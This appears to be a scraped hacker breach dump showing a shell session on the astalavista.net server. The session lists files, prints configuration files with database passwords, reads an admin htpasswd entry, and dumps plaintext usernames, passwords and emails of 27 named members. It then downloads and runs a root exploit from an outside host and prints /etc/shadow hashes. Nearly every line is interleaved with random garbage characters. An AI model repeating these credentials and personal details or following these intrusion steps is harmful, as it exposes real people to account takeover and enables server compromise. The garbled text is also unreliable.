T- F3 x" T# Z- _& v; h* W9 l/ Edrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com& A7 h9 w0 C% ]4 K/ d
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
5 C, P3 U( J. C2 {" H5 \0 Qdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner/ j$ a- l; W% s
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
3 r6 I3 a) t' B- H8 a% Ldrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
& Z, n0 R0 _: c# x4 D3 w+ Udrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron* C6 l: `9 v0 Q( s
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
; p7 T/ h. R$ y4 j9 P-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php% @8 O0 w; d$ |2 Q \0 S6 w
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico+ C% P8 v7 T) r
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed9 [( c Y+ O ?) f) {0 F
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour2 R9 E! a. E) ]# Z& t8 S0 k5 L; A
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess( e" t- D2 z* \9 I5 Y$ l
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
`+ B$ E) h. V. R: ]9 ]-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php: C1 ?' C) z( |) z( j! d
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
; H& n, s2 y+ \) h-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php2 b2 ]7 Z1 s; L' B# |
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
: Q1 M5 p% ]0 a+ b" z" }-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
5 e) {( f4 v8 |! Y% y5 d/ [/ Hdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc# D* N5 ^4 K7 ~
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang8 v9 I! _9 M' o4 y
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib8 l5 \% d: s( |1 s
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
7 V3 a0 Y M/ o o+ K Edrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
2 ~. W& {3 D, N6 Mdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata+ N* H+ i) [ L# s
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new7 o, a4 C+ K7 W) A3 s' ?
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf+ W; z, `$ J7 R6 j y. h& ?
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re; M1 q1 F# R, p; d7 \, U& z
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
0 O7 `& T2 @5 h& H4 Y) a+ k, G7 Rdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
. l5 }- n0 Q! a2 `drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources: O- t2 }/ ^( ]) J( C
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
# L( C- v5 I& C t5 e6 k4 r( Jdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
/ e4 ?' l) ]" b; C. a; y. tdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
, H) b. q/ U4 Y5 T) Edrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
% c& S) O: I8 @# Kdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
; I# k4 `7 f x1 d6 D9 m7 mdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
+ M2 Z0 i) C! L& r! l+ D-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php W3 H! a6 g1 [4 _4 \
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki3 i- z! s0 q/ |/ i X9 R
2 P7 N& {4 p* b+ T) P) N1 j0 y
sh-3.2$ head -20 index.php0 x! s) i! } J; _0 ]7 i. X( Q
<?PHP9 y& i8 [1 v* h; N2 K1 H* c- r1 ? @
/**9 v- S8 Z. l9 |) g/ @$ O5 L
* Mainfile (external) for astalavistaNET v2.04 e- U9 ^ ?! E
*
! c. P/ L/ B5 q' E* @copyright Astalavista IT Engineering GmbH+ N }- ^9 c' A; X1 T( m
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>% E- [/ p: e# b. S. T# G
* @version 1.0
2 o1 a* ]6 n9 q*/$ {: o& ?5 x) S. O
7 H6 v6 c& `+ h2 e% k8 G
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {% e" I* J2 U* w/ D
$dontStartSession = false;
0 n5 ?2 L' g" V' Z; P- S: B0 z } else {
+ Y! \1 `$ O+ \$ Z3 i9 W; q $dontStartSession = true;" x/ B+ K4 Q' ] m6 }4 Y
}
! F9 F9 `& O7 p. C3 s/ j; ?$ @ require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);0 h. k4 Y" E$ F$ ]5 ^# \ S
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);* q9 ^7 W2 u' Q2 Q8 Z1 c
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);. _; C' |7 a" ?; ?- X; J3 S
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);8 d! z/ _4 d o8 X& _$ t7 w
) b: r; l+ @, Psh-3.2$ cd config* d1 F3 ~" g4 R, W! I% @
sh-3.2$ ls -la+ R9 x) Y3 P; {4 X; }( D% d
total 321 { B$ E- [; u1 l! C# J
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .( h7 n2 U1 U v2 \
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..6 n& T& D! f, g% S% s! |7 h
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
$ W& I% z( a3 M9 I-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
' r) _: ]0 V5 x& j' M7 P! C-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
# p9 ^1 J a1 o$ `1 O X) h-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php6 y7 Q C! o3 D/ ^) V
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
5 x( p9 R; b3 \+ a- \& V2 ^8 R! O/ S( R) O
sh-3.2$ cat com.conf.php
, `0 y7 L! @& m; F( o[snip]
* H0 I0 S8 S# C# L$ ~/ x% U//member-database: H! j+ U! u k& G, d) F' k
$_CONFIG['db_mem_server'] = ‘localhost’;6 S3 _0 q9 N6 H
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
1 [5 `2 F- u0 a5 P$ z$_CONFIG['db_mem_user'] = ‘astanet_db’;
1 y8 f+ g. y* Y4 Q$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
8 \2 u5 m, _+ [6 i" N$_CONFIG['db_mem_debug'] = false; //true or false
8 T- @0 B( D3 X! H8 v//ads-database
& F ^4 J- W! h. {* V7 u% E* @ D$_CONFIG['db_ads_server'] = ‘localhost’;6 c0 @4 H! w6 a5 B
$_CONFIG['db_ads_database'] = ‘astanet_ads’;4 W( g' h: _9 C4 o
$_CONFIG['db_ads_user'] = ‘astanet_db’;# E& ~5 U) W' E2 F* Z
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
& T$ L6 s& \3 L& K$_CONFIG['db_ads_debug'] = false; //true or false
j, I. A& M7 \$ C; N//rainbow-database p% R$ L. V: z* u$ o# y
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;& y9 p& q! y8 R3 P! N9 v8 _. J
$_CONFIG['db_rainbow_database'] = ‘rainbow’;8 t1 R+ I9 l7 M2 z( _4 p. q
$_CONFIG['db_rainbow_user'] = ‘dinu’;
) K' b0 l5 u7 e- G- L$_CONFIG['db_rainbow_password'] = ‘dinudinu’;% i2 m4 q( l! B. r
$_CONFIG['db_rainbow_debug'] = false; //true or false
. X9 w: k6 U! A% W! ?' y//mailing lists database
) A* ^: U# I Z+ [' c, a4 m% o0 R% L$_CONFIG['db_mailing_lists_server'] = ‘localhost’;: w; x9 U- j) n3 M
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
" ]/ j2 @! p, K$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;$ l, x0 r+ T l
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;; s, V1 K9 ?9 M6 c
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
) N; X3 Z8 }- F! N" o//paypal
8 t/ v& t I$ s% y& `; T& F$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
( L% z: `& O: f, g8 K8 A$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
3 V% y' ^5 }1 c# U- q$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;! V2 @1 m& u7 m' \' A% L
$_CONFIG['sub_pp_noship'] = ‘1′; w& \% i$ U) h, \& n
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;/ G+ Q( N8 W( _; U# k
[snip]
; X4 ]) t8 W. A" t% n( }' j u' r$ G& T9 m$ J! \7 D
sh-3.2$ cd ..
; R9 E- W# r$ n" |9 |5 Z% C! xsh-3.2$ cd member/ |8 M+ s. |8 x5 _, `; r% _
sh-3.2$ ls -la7 r$ _; y T" q) B j+ |/ b
total 20& P: v) @$ R9 R/ ~& J3 ^% M
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
: U( a4 Y' B, ~* ?- _* a0 {drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..! F' A- a! C# ?. w3 `5 S$ Z8 }$ d3 P t
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
5 @$ h3 w( U$ p! _7 }" E-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
8 v% q& _0 j' ] b- @# K+ Wsh-3.2$ cat .htaccess* P8 E6 U% a& L( K
SecFilterEngine off+ M: W7 H* ]4 i. @3 v8 ?
$ R8 M' z3 f) {1 l% R4 j4 v" O% [) Q
sh-3.2$ cd ..; `6 {. K% C2 q! }
sh-3.2$ cd cron
+ U& Y+ K. ^+ T4 j3 x9 esh-3.2$ ls -la! S9 o0 W/ p0 `0 B5 a
total 168
& e2 M- N; S+ O% m8 E9 |drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
/ s% S7 u# S1 s! M/ Z* X( _9 {drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..6 d; P+ p& k, t8 h% S7 e
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php9 q3 r0 \- D( t7 B2 u+ E: h
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php) t g; P' k7 V9 [* S: c3 e+ }
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php S7 \$ A7 \( C0 o
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
: Z: ~( Q$ N4 M+ p+ ?& f, Q- D5 u. k-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php- z' P4 `9 t, L, r; P- m9 P
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
4 O. |$ B, S! ~' b7 c4 N-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
- o- S0 s5 S$ l; f, {, }1 }-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php" W5 L6 _& |1 } Q5 U
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
# h1 c0 w; S: {4 e-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
- e$ l6 W/ \$ P, d, h-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
" m, y$ A1 S4 X- k/ j4 [9 N4 H1 d-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
- E) v- W2 z+ U$ |-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
4 o' Z" B, C8 Z f, [-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php$ c! h7 N# q! K" ]$ {( ]
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
4 ~( W: D+ g% I% X- X& o-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php# Y4 T* E8 ]2 f) C1 ]) `1 s0 ^' v6 v
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
% O# Q) j& C8 q6 r, x- o-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
& _! s" n. k9 L* B" F4 f; C+ R& adrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
+ ^9 S. L' M* ~' v, v-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
# y3 H( c, \- |) `1 _. Z( o: u-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php& A: ^/ _$ z, P5 @: q
9 f {/ G2 f- B2 esh-3.2$ cd ..
+ d- g e+ S, w% Psh-3.2$ cd _007
D5 R4 h+ d- Ush-3.2$ ls -la, W6 y/ @( _; u! x$ t
total 24
L4 ?/ e/ t: |drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
5 |4 Y1 L+ v w2 ]: i6 Ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..& ]: F) T( _+ |8 N7 b
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess' m5 Z; C4 M1 S- Y* f* T! F
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php; g- b7 u; K" }' U+ K
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
. A+ U" x8 h3 k% c& h# h- F0 ^drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
& h2 z4 N/ g" m' |8 U% Q, ^* g- m2 F* d
sh-3.2$ cat .htaccess& h3 @9 s6 _$ t6 p% u2 P
authType Basic
1 {) U% p' W6 U2 t- NauthName Admin9 W% X: B, m, M! ^ c/ ], Z' \
authUserFile /home/astanet/auth/.htadm_pwd8 Z x! r9 A2 A; F
require valid-user M& ]! s" J$ _/ e0 P" |1 }0 I
! X5 G" C5 @0 Z
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
" h8 s4 J& f2 {) [! ^, M, u5 a1 Radmin2net:CR0bl65MwhfT
8 u2 K3 n( X" S c+ V- Z! ~3 W% F/ U$ H }- }% ~, b
sh-3.2$ mysql -u astanet_db -p
& e4 `: Y4 f7 c* [Enter password:
' E+ P# i. K2 a+ \' z1 \6 tWelcome to the MySQL monitor. Commands end with ; or \g.+ \$ Y! d+ G$ F7 f5 C
Your MySQL connection id is 275153! f6 g( k: E" k( v# O$ Z! U
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
% p- `6 ?8 h0 q% @* I9 l9 K( P5 G3 W- _8 \* U
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
3 A+ z! P) l( Z+ y( D
9 z2 t! z$ q0 } d. s' Rmysql> show databases;
$ J6 v2 M( w) @# C8 W+ B8 e5 n+———————–+
3 F; F1 d; @2 E9 j6 [| Database |
9 J: t0 y& w" x2 {: w' Q5 q5 F+———————–+
( M" P# ^( j4 E. B| information_schema |4 E7 e ]0 d: `. q+ S' s8 v
| astanet_ads |' a; ]/ O4 Q+ r$ I! v. b
| astanet_mailing_lists |
- ~7 c- D; r- q) k# M/ {. ^# z, N- x| astanet_mediawiki |/ X: v, P. s H$ w9 j) K* G8 _% U
| astanet_membersystem |
1 Y" k. U" D) n, h {/ c1 _& `9 Z| test |
+ g# U- g, j0 F* J# y' h5 B+———————–+
; t x+ p6 i. C6 rows in set (0.00 sec)
. @4 |# X( j% \2 `: @7 s8 `8 S6 y+ ]/ p2 ]8 s/ N, q# X, s% ~
mysql> use astanet_membersystem" h, X% ~1 g& C' r4 ?7 i7 }
Database changed
2 y2 o% U& j4 bmysql> show tables;
* Z" S3 ~3 t& u+———————————–+# u7 g( A% ~) F/ e: j
| Tables_in_astanet_membersystem |
+ ? v/ ~# N" @, `) }$ Z+———————————–+
) U5 c! C S( b| blacklist_categories |
# Z( R7 ?: A, }| blacklist_content |
0 {# \$ h+ @# a, X7 v| blacklist_levels |+ w- @3 I8 A- C
| blacklist_mcset |) |% P1 [7 x6 U
| dir_categories |
1 Z9 W% F2 k. [# {4 \5 w" G| dir_comments |4 \* C# M T( |+ e
| dir_links |
, a: \/ ^- s" O" D1 y| dir_temp |
) j* g2 b# [: g4 b| dir_votes |% V, G3 p, X O x3 L
| documents |4 Q' L& _ n! V" t! |6 P2 R- h% Y
| documents_categories |- O$ Q& g) z/ i1 d- C/ e
| email_content |# r. s4 `- a f
| email_settings | S1 P0 c$ _) X1 j
| exploits |
- E0 e7 c" V" m0 u- Q% s, m4 X| exploits_categories |3 ^3 D/ n" q6 n; J* w
| exploittree_categories |' c2 x$ X7 W5 A( A+ o
| exploittree_exploits |
0 Q+ A o: `+ A! ]5 L4 ~/ h| home_values |
6 G* Q; J {9 J8 t| iso_countries |
! d; v: y- D' \| links_categories |
9 L0 W1 Q- x: v b+ b| links_records |
4 e; W0 |% U& c5 B1 ~/ j| links_unauth |
9 i1 r7 t/ f7 a9 d7 h| links_votes |
8 o# i! d2 d6 P( o( ~4 I8 b| log |
) Z, N t% ^, z" o| news_categories |% M4 W1 h' }+ G' E0 D
| news_comments |
6 q% t( U0 J2 A, w+ ^| news_emoticons |
1 j6 o% |* B% ~& x| news_latest |1 M& |% w. F# ?& z( u
| news_messages |/ y/ o* v$ c" f ?! g7 h8 [
| news_statistics |1 {. s5 g {+ g- Z0 [
| news_votes |
* _& H# G: Y0 q+ H8 x| prices_content |0 r! R2 V; x: \( `1 L- z
| prices_offers |
% a: @" n4 O: m. [# g| rss_settings |
" K- ~- V6 M @+ G: L| sessions |
9 D( q$ f! c1 X$ a| stats_signups |/ t5 ^4 q8 [& c0 F
| u2u2 |
8 h# F9 ?3 C w t9 e" V| u2u_contact |# j& a, c( w( v) a" n H' d
| u2u_settings |6 ^3 I4 Y. y) k+ S
| user_keywords_selected_categories |$ d& A6 A, k" b) z7 B: q5 }
| users |
/ {# i) E! ~* n& q; H| users_ipn_test |! ^& M' S8 H' E: t e
| users_keyword_values |
4 d- X6 W# a+ z6 Y$ ~- y& J| users_profile |, X r2 g1 i' W( z9 L/ V- M
| users_temp |
+ `3 L- D8 Z0 r7 f| users_upgrade |
" J+ ]7 T1 S& S, O. ^0 v+———————————–+
& O; H$ t! q8 ]8 |( K' F* p46 rows in set (0.00 sec)" J1 Q1 ^4 S) `& d, \
O: A+ f e% p2 c3 F- u
mysql> describe users;
9 e g: ]- t; |# ^+ q, m1 ?+————————–+————————————–+——+—–+———————+—————-+
* X) r( ?& I8 ]* T% Q3 Z| Field | Type | Null | Key | Default | Extra |/ ]; E$ E: E' E
+————————–+————————————–+——+—–+———————+—————-+
4 Y$ o# I: T6 g% ^, t/ w| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |7 [4 ]/ h5 J1 w9 g0 J
| user | varchar(50) | NO | | | |0 i1 l: z1 ]6 H# k1 P# y; |! B3 A
| nickname | varchar(30) | NO | MUL | anonymous | |, C- |3 ]; A1 v: ?* o0 ?1 _
| password | varchar(30) | NO | | | |
' K# U) ~6 R) X2 }4 R- d| userlevel | tinyint(3) | YES | MUL | NULL | |
( e: n% J8 X0 Q* e| exp | int(8) unsigned | NO | | 0 | |" }. L5 Y( y0 g# M
| email | varchar(50) | NO | | | |. w" B z; m% R' k, i6 O, `! a
| ip | varchar(15) | NO | | 0 | |
4 g8 [7 J6 h h: E2 O| proxy | set(’0′,’1′) | NO | | 0 | |; Y4 t2 t0 g! a9 K
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |! }1 k' X0 z( b" v$ K& U
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |$ O5 w8 S/ i. _
| anz_in | tinyint(1) | NO | | -1 | |
' P) p( {- Z, x3 u1 u| status | tinyint(1) unsigned | NO | | 0 | |* O8 b; g# x9 i2 o9 k
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
& B5 G0 _: y! n" I% H| freemember | set(’0′,’1′) | NO | | 0 | |% X( b3 _- d( G& A& M/ q# L6 F
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
% m% j" [ w) h O( [| lang | tinytext | NO | | | |! v' g) f q8 F& J2 C3 R8 d4 K7 y
| adid | smallint(6) | NO | | 0 | |
0 O8 P# v5 _# h% @, ^- }% ~. ?| pp_txn_id | varchar(255) | YES | | NULL | |, Y! Q& Z, o0 ]5 J% a3 ^6 B7 V1 X
| cnb_transaction_id | varchar(255) | YES | | NULL | |
+ L. L: v# ]9 || cnb_order_id | varchar(255) | YES | | NULL | |5 w# z: L5 J' i* j0 g* o5 V
| cnb_user_id | int(11) | YES | | 0 | |3 u6 P4 K9 \) W! \
+————————–+————————————–+——+—–+———————+—————-+8 R z% i) a) s: M2 W m: T
22 rows in set (0.01 sec)
) T4 I2 V2 g% n% X# H! R' [/ @: o5 [- t$ y: A% o& k5 C; m2 x
mysql> select count(*) as skids from users;3 Y! s, G0 F- i5 `4 N
+——-+
) U* Q6 H8 h6 r) D" L1 N. S; D* \7 c| skids |
3 Z" K t/ A; a; j' G% Y# V+——-+/ e, j' ]- K/ h% t1 l3 s! V# F
| 25199 |# c" [5 _: ?4 A* v& q8 z
+——-+
* h' D( h0 l8 N; p6 U& P, E5 m1 row in set (0.00 sec)
9 v8 F9 [* W3 p7 a
t4 M; h2 T" \mysql> select user,nickname,password,email from users where userlevel = 1;
; T. _+ g) x/ `- N3 n. F+————————–+———————-+——————+———————————–+" }$ z7 n' W" Q8 N8 ?% |% m
| user | nickname | password | email |
1 `' h* G2 w, b" A8 {+————————–+———————-+——————+———————————–+
$ L, }- J' A* Y# n1 e| pascal | prozac | astaman3 | 链接标记info@astalavista.net |: u4 i* K2 G7 A8 E. s* Z8 q) C/ }
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
+ [/ A/ J% e5 Y2 G$ f| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |% n) P5 |/ I+ r6 l3 c0 f
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |! W7 S5 U" p& N
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |" \' z1 k( l/ T0 c1 t
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
* }/ \, Z7 E: n: P; K6 f8 u| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
+ ^, |# [9 s% s1 J& j( V- b| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
) Z L: B- r: Y+ e9 W% T| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
7 h, F9 h1 I5 {% c$ ~1 I| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |2 K; |$ u. W: x4 r8 ]
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
1 x# y C. u6 q W4 U3 q0 g" \2 c| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
0 @) Z* l+ [' N; h* g" s| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |1 f9 [/ ]3 M# m" l( S8 u9 ~9 q
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
8 I8 V9 h# d4 m' y6 Z0 w- S| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
/ s# e/ W5 K6 {| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |* A) N# f/ i( r; d, r, x
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |2 B# S9 ]6 o" F% l9 I5 Q# [
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |; C$ i( r1 |4 N/ }) F3 E6 t. V
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |" a# C0 q$ N2 _
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
( S6 ?- J' ^# s$ I+ l0 ^: || Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com | A$ f% I$ A6 i; W/ h
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |/ G* i3 g# @; }2 T' u* ^, B2 j
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
8 k/ f7 O. S% r2 w# `6 e| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
* @: X# U( @0 d- |- x| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
4 {! E# v/ J- i& v" i. W| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com | @ o7 g4 W: J: O+ ], S3 @9 t
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |3 F: @( ?, y, H' w; q( l' J& D
+————————–+———————-+——————+———————————–+: h* p5 ^9 d) J. q: B
27 rows in set (0.00 sec)
# n7 d- N9 a" q6 s Z E# Q; f3 h6 g' [# U) V
mysql> exit;
: B1 A! O( |" k# XBye- w9 s' ~' b* K! @
9 p# h0 a* h4 h+ U5 V U. [* B* @[~] plaintext passwords? yes,3 \5 I4 a( ?8 p5 j/ c* Q
Those so called “security professionals” who charge you $6.66 / month to
1 K4 q9 J& z: {& h: wregister at their hack-proof portal, save your passwords in plaintext…+ k3 Z! H [+ n( e
brilliant!
! V* o ^- ^1 y E$ m3 c# M% c8 E
) D/ z1 c/ b' z2 }$ T+ p' \* ^[~] This been fun but we want more.
7 R6 `5 v" G4 T( \% o: q: s( ]0 f: ~8 K: I2 ^4 y
sh-3.2$ uname -a9 D, [3 k# N, b+ M9 f
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux: M. C8 b, V, ?" j! F
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
9 J, [" {' I9 @–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]3 x! {4 B! ~" {7 A7 g3 \
Resolving anti.sec.labs… 13.33.33.37
# O+ Z f9 X$ L$ e6 GConnecting to anti.sec.labs|13.33.33.37|:80… connected., y, d9 S- ^5 {* |( k" a0 G
HTTP request sent, awaiting response… 200 OK
1 ]" Z( S8 L! d" K" @Length: 18200 (18K) [text/plain]
1 m3 a5 [& i1 i9 E5 V2 w7 N0 \3 \Saving to: `g0troot’+ t ^: j$ j0 O/ x6 B
) t$ I% o2 B. G& X4 _/ ?9 i! ?
100%[=========================================================================================================================================>] 18,200 58.6K/s in$ c9 q: Z0 ^# ^+ m8 i: n
0.3s
- j/ X \. P r; Z y
5 N" [6 I$ `2 p$ q( j. b18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]+ U( I% L) R- `1 N" \
! ~$ q$ h# S9 `3 k( F/ ^8 @
sh-3.2$ ./g0troot -i x86_64
. n3 i* T( S! `7 q[+] g0troot - anti.sec.labs0 ~1 Z* n0 J) y: q- g, P# v0 j
[+] Target: 2.6.18-128.1.10.el5
2 @( o U+ ?# S0 P9 Y f9 o: q7 S[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]% m! E9 }4 p- i& F" ]! n/ k
: S8 w5 d9 ~/ F( `% n+ T, ^[+] r00tr00t8 C9 U, O0 h! H# |/ X. f) r$ z. ~" Z
[~] Executing shell…
& j* \% o6 u( o- P- L& @8 M" M# c( P: R% q- m4 k3 o- F
sh-3.2# id
* U! g Z$ a: @: k' R: d/ Yuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)$ R# s6 }* I7 G3 N
* `5 y' d! |% [& d2 Y
sh-3.2# cat /etc/shadow
: k$ ]: K+ n8 E$ T4 z( X( Q" [root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::8 ~( {/ o6 V+ R8 x, Y
[snip]- o' {- g0 f" |+ w Q, c( q A7 q
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::9 @( l0 X. s/ u( Q- g; u+ I+ D" |) @
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
$ o- R9 C2 ~$ u9 D8 Zcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::7 T3 t% J* [. n- d( ?% r9 Y
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
# S! L% X; G. X9 {( R- ?$ _5 x3 }9 B1 G x; H+ i F3 U+ Q4 M W
